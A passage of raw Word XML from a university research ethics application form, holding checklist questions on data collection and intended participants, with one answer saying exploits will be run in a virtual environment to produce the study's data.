          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1994977168"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6FC0A324"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-2119442801"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4C3F946A"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61FBEAC3" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7103BAA0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="371B7780" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Investigation of participants involved in illegal activities?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-570350383"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="33C42837"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-904758639"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="0747A119"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20270662" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="186A1AE7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3996BE26" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Use of procedures that involve deception?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="362719355"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6709946A"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1074700241"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="758F93D3"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67B0B7D5" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="142C937A" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D2279CD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Administration of any substance, agent or placebo?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1924798936"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7EA77613"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-624625241"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7969B77A"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00B4AE24" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0189519B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C0C5804" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Working with live vertebrate animals?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="300428637"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="5099477A"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16" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1236861983"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2357F73D"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6B6D8EEB" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2E89396D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="616CD3BA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Other primary data collection methods, please explain in this box</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270376B4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:lastRenderedPageBreak/>
              <w:t>For example, ‘focus groups’. Please indicate the type of data collection method(s) in this box and tick the accompany box.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="2049023668"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4AED9761"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16" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1900947946"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="17D542BA"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4645CA12" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6510B3CC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8227" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CCE7EA3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Details of any other primary data collection method:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28DD11C7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43FFBB9C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>When the exploits are run in the virtual environment the results will form the primary data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44CD31FA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F0329A7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="816" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07619961" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E65F857" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>If NO to every question, then the research activity is (ethically) low risk and may be exempt from some of the following sections (please refer to Guidance Notes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F51FB6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ECE5791" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">If YES to any question, then no research activity should be undertaken until full ethical approval has been obtained. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D023656" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EB40DB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>SECTION G: Intended Participants</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10485" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="562"/>
        <w:gridCol w:w="3256"/>
        <w:gridCol w:w="3832"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="137"/>
        <w:gridCol w:w="714"/>
        <w:gridCol w:w="136"/>
        <w:gridCol w:w="822"/>
        <w:gridCol w:w="34"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="779EF9EE" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0423F392" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7243CBA1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Who are the intended participants:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2DE7C40B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="822" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="2F58AAD8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="255AB5D0" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="28E71B05" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45045686" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Students or staff at the University?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-227763996"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="52782600"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-947306252"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="6656A73D"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40B51B02" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="23FDC08F" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58D0F92D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Adults (over the age of 18 and competent to give consent)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1780247199"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="63F41B45"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="666435130"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="26C723CC"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32D079EE" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7ED9E3A7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07FF8C43" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Vulnerable adults?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="555978563"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="71B48CED"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-435668532"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="368F4ED8"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706F19E2" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
